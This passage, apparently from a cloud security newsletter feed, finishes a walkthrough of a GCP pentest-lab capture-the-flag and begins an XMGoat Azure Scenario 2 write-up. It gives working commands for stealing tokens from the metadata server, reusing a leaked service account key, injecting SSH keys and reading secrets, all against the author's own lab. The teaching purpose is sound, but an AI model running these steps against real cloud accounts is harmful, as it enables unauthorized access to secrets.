preferred). Configure your Google Cloud account as given in the <a class="link" href="https://github.com/lacioffi/GCP-pentest-lab/tree/main?tab=readme-ov-file&utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-pentest-lab-ctf#running-the-lab" target="_blank" rel="noopener noreferrer nofollow">initial steps of this lab</a>.</p><p class="paragraph" style="text-align:left;">First, clone the GitHub repository.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/ab183008-2f91-478c-9481-e889f5be77b1/image-1.png?t=1731253844"/></div><p class="paragraph" style="text-align:left;">We can see the terraform files in it that we need to run to spin up this lab.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/5af91bf4-1efd-46c9-a932-f13f89313d7c/image-2.png?t=1731253857"/></div><div class="codeblock"><pre><code>terraform init</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/81d1fd4a-5bad-4e71-b508-25d5c209b10a/image-3.png?t=1731253873"/></div><div class="codeblock"><pre><code>terraform apply</code></pre></div><p class="paragraph" style="text-align:left;">While deploying, enter the project ID of the GCP project you will use to run this lab.</p><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>Note:</b> For this blog post, we are deploying on a GCP project named <b>cloudsecurityclub-gcp</b></p><figcaption class="blockquote__byline"></figcaption></blockquote></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/80a7a422-9f9e-4599-abf4-ee3bca856a11/image-4.png?t=1731253909"/></div><p class="paragraph" style="text-align:left;">We get a public IP of the VM, which is the entry point to the labs.</p><h1 class="heading" style="text-align:left;" id="flag-1">Flag-1</h1><p class="paragraph" style="text-align:left;"><b>Description:</b> Flag 1 is in an open bucket</p><p class="paragraph" style="text-align:left;"><b>Solution:</b></p><p class="paragraph" style="text-align:left;">Let’s try visiting the IP address from the output in the browser.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/49d0e829-4242-418e-970b-1be8a326bd3d/image-5.png?t=1731254198"/></div><p class="paragraph" style="text-align:left;">The images on this website are hosted on GCP buckets. The name of the bucket is <b>cloudsecurityclub-gcp-prod-bucket</b>.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/8479f543-b0c8-4f3c-9dcf-73917601604f/image-6.png?t=1731254228"/></div><p class="paragraph" style="text-align:left;">We can see if the bucket is misconfigured to list the contents of the bucket.</p><div class="codeblock"><pre><code>https://storage.googleapis.com/storage/v1/b/cloudsecurityclub-gcp-prod-bucket/o</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/9ed3c630-4dca-48f9-8533-2e21df82ff2c/image-7.png?t=1731254258"/></div><p class="paragraph" style="text-align:left;">When we tried to do so, we got an error message saying the user didn’t have the <code>.list</code> permission on the resource. In simple terms, the objects in this bucket can be public, but the bucket doesn’t list all the objects in it.</p><p class="paragraph" style="text-align:left;">However, the Flag 1 description says it is an open bucket. Let’s see if other images are hosted elsewhere. </p><p class="paragraph" style="text-align:left;">In one of the images on the website, we can see that the bucket name (<b>cloudsecurityclub-gcp-dev-bucket</b>) differs from the previous bucket we found.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3dd6c830-6bb2-423f-89f1-dcc4c89e917d/image-8.png?t=1731254307"/></div><p class="paragraph" style="text-align:left;">We will see if this bucket is misconfigured and lists all the objects.</p><div class="codeblock"><pre><code>https://storage.googleapis.com/storage/v1/b/cloudsecurityclub-dev-dev-bucket/o</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3fdd1c60-b071-47e3-9579-42bf6a3dc8ed/image-9.png?t=1731254335"/></div><p class="paragraph" style="text-align:left;">We can see the list of all the objects in this public “dev” bucket. </p><p class="paragraph" style="text-align:left;">Now, we will analyze all the objects.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e0e47dab-8744-4594-b46d-9125ec50d5ed/image-10.png?t=1731254359"/></div><p class="paragraph" style="text-align:left;">We can see this object named <code>flag1.txt</code>. We will download it using the <code>mediaLink</code> given.</p><p class="paragraph" style="text-align:left;">Just click on that <code>mediaLink</code> URL or paste it into the browser.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/9aadfb7e-5aca-4850-97be-cd59ff87871a/image-11.png?t=1731254377"/></div><p class="paragraph" style="text-align:left;">The downloaded file has our first flag.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/2b53da36-ba3b-491a-9e2c-536a3e2b04bc/image-12.png?t=1731254399"/></div><h1 class="heading" style="text-align:left;" id="flag-2">Flag-2</h1><p class="paragraph" style="text-align:left;"><b>Description:</b> Flag 2 is in another bucket, but this one isn’t public 🙂</p><p class="paragraph" style="text-align:left;"><b>Solution:</b></p><p class="paragraph" style="text-align:left;">From the objects in the same <b>cloudsecurityclub-gcp-dev-bucket</b>, we find another interesting file – <code>sync_sa_key.json</code>.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/6b530991-3f66-45a1-a47b-4d7359b33b7e/image-13.png?t=1731297176"/></div><p class="paragraph" style="text-align:left;">Upon downloading it in the same way as above, we got the below key.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/12fe7626-f1e0-411b-8df6-2cfd3f3d05d5/image-14.png?t=1731297189"/></div><p class="paragraph" style="text-align:left;">The service account file contains base64 content. We will decode this base64 string and rename it as <code>decoded_sync_sa_key.json</code>.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4a88c23f-94db-424c-88f5-34fd9f562e2d/image-15.png?t=1731297206"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/37c82f41-e4d5-4a5e-841a-f36511a47140/image-15-2.png?t=1731297302"/></div><p class="paragraph" style="text-align:left;">Now, we will activate the service account with this decoded key.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/68aff945-2cc4-4783-a2be-85eeb0e94f6a/image-16.png?t=1731297215"/></div><p class="paragraph" style="text-align:left;">Now, we will list the buckets using this service account.</p><div class="codeblock"><pre><code>gsutil ls</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/39461477-fc12-4d1e-a9f0-ed4d0435a909/image-17.png?t=1731297225"/></div><p class="paragraph" style="text-align:left;">We now will list the content of <code>cloudsecurityclub-gcp-secret-bucket</code>.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/761349ea-5b3f-41ff-839b-fc96c9cd58f9/image-18.png?t=1731297343"/></div><p class="paragraph" style="text-align:left;">This shows that this bucket has <code>flag2.txt</code>.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e1b48773-0c65-4419-8aab-759a9c23a1c0/image-19.png?t=1731297357"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/8acaef2b-06e6-46d2-aa85-5f8f1324da25/image-20.png?t=1731297372"/></div><p class="paragraph" style="text-align:left;">We got the second flag.</p><p class="paragraph" style="text-align:left;">Also, when we list the content of the other secret-secret bucket, we can see that this bucket has <code>flag-6.txt</code>.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/d4e2902c-0642-47c2-a256-89ac54978170/image-21.png?t=1731297389"/></div><p class="paragraph" style="text-align:left;">We got an error when copying this <code>flag-6.txt</code> from this bucket.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/cbf1a76f-9971-40fb-842d-5cbe0d590957/image-22.png?t=1731297408"/></div><p class="paragraph" style="text-align:left;">We’ll get back to it later. We will go to find the next flag now.</p><h1 class="heading" style="text-align:left;" id="flag-3">Flag-3</h1><p class="paragraph" style="text-align:left;"><b>Description:</b> “Flag 3 is sitting inside some source code.”</p><p class="paragraph" style="text-align:left;"><b>Solution:</b></p><p class="paragraph" style="text-align:left;">We will access the web application’s source code by SSHing into the virtual machine.</p><p class="paragraph" style="text-align:left;">For that, first, we will set the public ssh-key into the metadata of the compute instance. Then we will try to ssh into the instance and search for the source code there.</p><p class="paragraph" style="text-align:left;">We will generate the ssh-key:</p><div class="codeblock"><pre><code>ssh-keygen -t rsa -b 4096</code></pre></div><p class="paragraph" style="text-align:left;">We will keep the name of the SSH key as <code>ssh-key-gcp</code></p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/2af44b8d-88ea-4a81-9ae6-42817c37d69b/image-23.png?t=1731297693"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/93b416ab-c0bd-44b6-8bcc-d278fb89828c/image-24.png?t=1731297703"/></div><p class="paragraph" style="text-align:left;">We can see that SSH private key and public key are created.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3275b5f8-aed5-4434-bb35-2e8bafac665f/image-25.png?t=1731297715"/></div><p class="paragraph" style="text-align:left;">We will set this public key in the metadata of the compute instance and use the private key to ssh into the instance. </p><p class="paragraph" style="text-align:left;">We will now add the SSH key to the metadata of the instance</p><div class="codeblock"><pre><code>gcloud compute instances add-metadata cloudsecurityclub-gcp-flask-vm 
--metadata=ssh-keys=&quot;ubuntu:&lt;ssh-key-gcp.pub&gt; ubuntu&quot; --zone=us-east4-a</code></pre></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>NOTE: </b>You can check the name of the instance and the zone by listing the compute instances - <code>gcloud compute instances list</code></p><figcaption class="blockquote__byline"></figcaption></blockquote></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/6cf496b7-6b22-481f-bbed-b2ad7d1cd46f/image-26.png?t=1731297797"/></div><p class="paragraph" style="text-align:left;">Now, we will use the private key to SSH into the instance.</p><div class="codeblock"><pre><code>ssh -i &lt;private-key&gt; username@&lt;external_ip_address&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/ac69d6fa-f5e0-4f1e-bea1-6751bab7ef6d/image-27.png?t=1731297832"/></div><p class="paragraph" style="text-align:left;">We are inside the compute instance now. We can see the machine’s name, which is also the name of the compute instance.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/ac9ff161-c82e-4064-8d5d-ce6266e26062/image-28.png?t=1731297846"/></div><p class="paragraph" style="text-align:left;">Inside the <code>/etc</code> folder, we can see the <b>gcp-pentest-flask-app</b> folder.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/6a180d85-f34f-408c-8c12-435a7fea3ac9/image-29.png?t=1731297862"/></div><p class="paragraph" style="text-align:left;">Getting into that folder and listing the contents of it</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/0c76b4a8-5b08-4bb8-85b8-65af70923c10/image-30.png?t=1731297877"/></div><p class="paragraph" style="text-align:left;">We can see <code>app.py</code> inside it. </p><p class="paragraph" style="text-align:left;">Since the flag-3 description states that the flag is in some source code, let’s explore the source code.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/2c99176f-e93e-4155-9cd6-006d2121e490/image-31.png?t=1731303896"/></div><p class="paragraph" style="text-align:left;">We found the third flag in the source code comments. </p><p class="paragraph" style="text-align:left;">Now, we will move to the fourth flag.</p><h1 class="heading" style="text-align:left;" id="flag-4">Flag-4</h1><p class="paragraph" style="text-align:left;"><b>Description: </b>“Flag 4 is a secret, literally!”</p><p class="paragraph" style="text-align:left;"><b>Solution:</b></p><p class="paragraph" style="text-align:left;">The first thing someone can think of regarding GCP infrastructure is the <b>secret manager</b>, as they store confidential information (secrets, in other words). </p><p class="paragraph" style="text-align:left;">Let’s see if the VM’s default access token has access to list and fetch secrets from the secret manager. First, we get the access token.</p><div class="codeblock"><pre><code>curl -H &#39;Metadata-Flavor: Google&#39; http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4313f0c2-293b-4207-a1ec-6bb1103f6472/image-32.png?t=1731303944"/></div><div class="codeblock"><pre><code>export ACCESS_TOKEN_DEFAULT_SA=&lt;token&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/a5dc798e-b554-4324-ad6d-36d827ca061e/image-33.png?t=1731303966"/></div><p class="paragraph" style="text-align:left;">We will try to access the secret manager by requesting the URL below with the access token of the default service account.</p><div class="codeblock"><pre><code>curl -H &quot;Authorization: Bearer $ACCESS_TOKEN_DEFAULT_SA&quot; &quot;https://secretmanager.googleapis.com/v1/projects/cloudsecurityclub-gcp/secrets&quot; </code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/fc02bf48-dac3-4276-a1ce-6064bd861662/image-34.png?t=1731303984"/></div><p class="paragraph" style="text-align:left;">The output says an entry in the secret manager with the name <code>flag-4</code>. We will try to access it.</p><p class="paragraph" style="text-align:left;">We will again make a curl request on the URL below, appending the secret name <code>flag-4</code>. Every secret <a class="link" href="https://cloud.google.com/secret-manager/docs/access-secret-version?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-pentest-lab-ctf" target="_blank" rel="noopener noreferrer nofollow">can have multiple versions</a>. Using the <b>latest</b> will fetch the contents of the most recent version. Also, we must use the <b>access</b> method to get the data stored in the secret manager. </p><p class="paragraph" style="text-align:left;">Our final curl command looks like the following:</p><div class="codeblock"><pre><code>curl &quot;https://secretmanager.googleapis.com/v1/projects/cloudsecurityclub-gcp/secrets/flag-4/versions/latest:access&quot;  --header &quot;Authorization: Bearer $ACCESS_TOKEN_DEFAULT_SA&quot;  </code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/0eec44d1-bc11-4e86-8b21-94aea99c4299/image-35.png?t=1731304005"/></div><p class="paragraph" style="text-align:left;">The data for flag 4 is visible and in a base64-encoded format. Let’s decode it.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/065caa42-df7d-40e0-b6f2-cc83b93f14fe/image-36.png?t=1731304016"/></div><p class="paragraph" style="text-align:left;">We have found the fourth flag.</p><h1 class="heading" style="text-align:left;" id="flag-5">Flag-5</h1><p class="paragraph" style="text-align:left;"><b>Description:</b> “Flag 5 is inside some instance but isn’t a file! “</p><p class="paragraph" style="text-align:left;"><b>Solution:</b></p><p class="paragraph" style="text-align:left;">Let’s see if there’s any juicy information in the instance’s metadata. </p><p class="paragraph" style="text-align:left;">We can see that this service account we got from <b>cloudsecurityclub-gcp-dev-bucket</b> is currently active on my local system.</p><div class="codeblock"><pre><code>gcloud auth list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/9a089cf6-67c1-4fa8-8003-99b5e179faa6/image-37.png?t=1731304065"/></div><p class="paragraph" style="text-align:left;">First, we will list the compute instance with the help of this service account.</p><div class="codeblock"><pre><code>gcloud compute instances list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/b84af802-9ff2-4e99-9cd1-e3c78e6656ee/image-38.png?t=1731304083"/></div><p class="paragraph" style="text-align:left;">We can see the instance’s name and zone from the above information.</p><p class="paragraph" style="text-align:left;">First, we will set the access token of the service account we activated from the key we got from the <b>dev </b>bucket into the environment variable <code>ACCESS_TOKEN</code>.</p><div class="codeblock"><pre><code>export ACCESS_TOKEN=$(gcloud auth print-access-token)</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1f4db37d-0147-41be-9397-b5f17fb47ac9/image-39.png?t=1731304106"/></div><p class="paragraph" style="text-align:left;">We will pass it on to the curl request we will make next to retrieve the metadata.</p><div class="codeblock"><pre><code>export METADATA=$(curl -H &quot;Authorization: Bearer $ACCESS_TOKEN&quot; &quot;https://www.googleapis.com/compute/v1/projects/cloudsecurityclub-gcp/zones/us-east4-a/instances/cloudsecurityclub-gcp-flask-vm?fields=metadata&quot;)</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/51d5de0a-f68b-4fe2-876e-38c937a82a06/image-40.png?t=1731304138"/></div><p class="paragraph" style="text-align:left;">We can see the request was successful, and we received the response.</p><div class="codeblock"><pre><code>echo $METADATA | jq</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/a7bb1f91-09b7-44c7-b259-c4477605be68/image-41.png?t=1731304154"/></div><p class="paragraph" style="text-align:left;">We got the 5th flag stored in the startup script in the compute instance’s metadata.</p><h1 class="heading" style="text-align:left;" id="flag-6">Flag-6</h1><p class="paragraph" style="text-align:left;"><b>Description:</b> “Flag 6 is in yet another bucket, but this one is the most restricted yet!”</p><p class="paragraph" style="text-align:left;"><b>Solution:</b></p><p class="paragraph" style="text-align:left;">While getting the second flag, we saw a <b>super-secret bucket</b> containing the flag6 file.</p><p class="paragraph" style="text-align:left;">We will try to access that bucket using the default service account’s access token for the compute instance.</p><div class="codeblock"><pre><code>curl -H &#39;Metadata-Flavor: Google&#39; http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/7a7be86b-bd37-4f44-b42f-baf42b858296/image-42.png?t=1731304200"/></div><p class="paragraph" style="text-align:left;">We got the access token of the default service account.</p><p class="paragraph" style="text-align:left;">We will use this access token to see if we can access the flag6 object in the super secret bucket.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4b2b4d0b-d33d-42ba-be02-90b10ccdd39c/image-43.png?t=1731304219"/></div><div class="codeblock"><pre><code>curl -H &quot;Authorization: Bearer $ACCESS_TOKEN_DEFAULT_SA&quot; &quot;https://storage.googleapis.com/storage/v1/b/cloudsecurityclub-gcp-super-secret-bucket/o/flag6.txt?alt=media&quot;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/598e6dcd-38cd-47ed-b5c1-3b3e3ad313b3/image-44.png?t=1731304239"/></div><p class="paragraph" style="text-align:left;">Finally, we found the 6th flag.</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=62484ef9-ae55-4755-9623-e2536a4b9e4a&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Solving XMGoat – Scenario 2</title>
  <description>Discover how to exploit Azure misconfigurations in XMGoat&#39;s Scenario 2, enumerating secrets and escalating privileges to Key Vault Owner.</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/f6c17c93-2e98-4045-ace3-da8f0cb033cd/XMGoat_Scenario_2_Cover.jpg" length="33182" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/solving-xmgoat-scenario-2</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/solving-xmgoat-scenario-2</guid>
  <pubDate>Tue, 02 Jul 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-07-02T18:30:00Z</atom:published>
    <dc:creator>Harshwardhan Solanki</dc:creator>
    <category><![CDATA[Ctf]]></category>
    <category><![CDATA[Azure]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">The setup is the same as the <a class="link" href="https://cloudsecurity.club/p/solving-xmgoat-scenario-1/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-xmgoat-scenario-2" target="_blank" rel="noopener noreferrer nofollow">previous scenario</a>; you only need to slightly change the terraform (<code>main.tf</code>) script. Azure provider doesn’t allow sensitive values in its output, so add <code>sensitive = true</code> to your code.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e78050db-4c71-4ab7-b8d8-9d801551ccb5/image-1.png?t=1731252909"/></div><p class="paragraph" style="text-align:left;">Also, change the storage account name. The hardcoded storage account subscription is unavailable.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4bd82924-3532-4827-863c-f2f1affcf189/image-2.png?t=1731252924"/></div><p class="paragraph" style="text-align:left;">Build the terraform plan.</p><div class="codeblock"><pre><code>terraform plan -out &lt;filename&gt;</code></pre></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><span style="background-color:rgba(0, 0, 0, 0);"><b>Remember</b></span><b>:</b> Create a new resource group on the account and provide its name when planning out terraform</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">Once successfully built, we apply those changes using:</p><div class="codeblock"><pre><code>terraform apply &lt;filename&gt;</code></pre></div><p class="paragraph" style="text-align:left;">To get the initial account info (username and password), use:</p><div class="codeblock"><pre><code>terraform output --json</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/60d59c5c-c9cb-4219-8d6c-953d65e6d927/image-3.png?t=1731252977"/></div><h1 class="heading" style="text-align:left;" id="enumeration">Enumeration</h1><p class="paragraph" style="text-align:left;">Let’s login with the credentials obtained from the terraform output:</p><div class="codeblock"><pre><code>az login --service-principal -u &lt;username&gt; -p &lt;password&gt; --allow-no-subscription</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/7f15d947-ee84-49a3-99d4-f3830e01ee42/image-4.png?t=1731253014"/></div><p class="paragraph" style="text-align:left;">We’ll use <a class="link" href="https://github.com/nccgroup/ScoutSuite?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-xmgoat-scenario-2" target="_blank" rel="noopener noreferrer nofollow">ScoutSuite</a> to enumerate permissions and resources accessible to this service principal. ScoutSuite queries for all possible Azure resources and potential misconfigurations.</p><p class="paragraph" style="text-align:left;">ScoutSuite supports <a class="link" href="https://github.com/nccgroup/ScoutSuite/wiki/Azure?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-xmgoat-scenario-2#supported-methods" target="_blank" rel="noopener noreferrer nofollow">multiple authentication methods</a>. We will execute the following as we have already logged into our target Azure account via az CLI.</p><div class="codeblock"><pre><code>python scout.py azure --cli</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/263f77d3-df39-4c7f-82cc-c117df731e82/image-5.png?t=1731253047"/></div><p class="paragraph" style="text-align:left;">Once ScoutSuite successfully analyzes the environment, we get an audit report.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4d744d54-ab00-45f9-8872-0f51d223c57f/image-6.png?t=1731253070"/></div><p class="paragraph" style="text-align:left;">It has audited all the services the service principal can access and given us a list of misconfigurations. After going through the issues, we found a service that stands out the most: <b>Key Vault</b>.</p><p class="paragraph" style="text-align:left;">Key Vault is Azure’s service for storing and managing sensitive data like keys, secrets, and certificates. We are likely to stumble upon more secrets.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/4e76adc0-6155-4218-bade-69e0acb13e49/image-7.png?t=1731253101"/></div><p class="paragraph" style="text-align:left;">From the issues, we find the key vault named <code>batcave</code> has RBAC disabled.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/27114e6e-e882-4b0e-9f50-b77b084f49a6/image-8.png?t=1731253087"/></div><p class="paragraph" style="text-align:left;">When RBAC is disabled on a key vault, access is governed by the vault’s access policies. Managing access policies involves specifying the permissions for different principals (users, groups, or applications) directly within the vault’s settings. This method allows for fine-grained control over access to the vault’s keys, secrets, and certificates.</p><p class="paragraph" style="text-align:left;">After further analyzing the issues and resources, we found an interesting Azure role named “<b>No Administering Resource Locks</b>.”</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/e9c55db2-5451-4fb2-a591-ea57215f81bf/image-9.png?t=1731253128"/></div><p class="paragraph" style="text-align:left;">This role is not a standard Azure role, and it alone is not significant to this scenario. Maybe it’s just a hint for the player.</p><p class="paragraph" style="text-align:left;"><a class="link" href="https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/using-resource-locks-to-prevent-accidental-changes-in-azure/ba-p/3842402?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-xmgoat-scenario-2" target="_blank" rel="noopener noreferrer nofollow">Azure Resource Locks</a> are additional security measures to prevent resource tampering or deletion. The hint may indicate that some critical resources don’t have a resource lock.</p><p class="paragraph" style="text-align:left;">We can manually test the environment using this initial foothold information from the ScoutSuite report.</p><h1 class="heading" style="text-align:left;" id="exploitation">Exploitation</h1><p class="paragraph" style="text-align:left;">Let’s try printing all the key vaults.</p><div 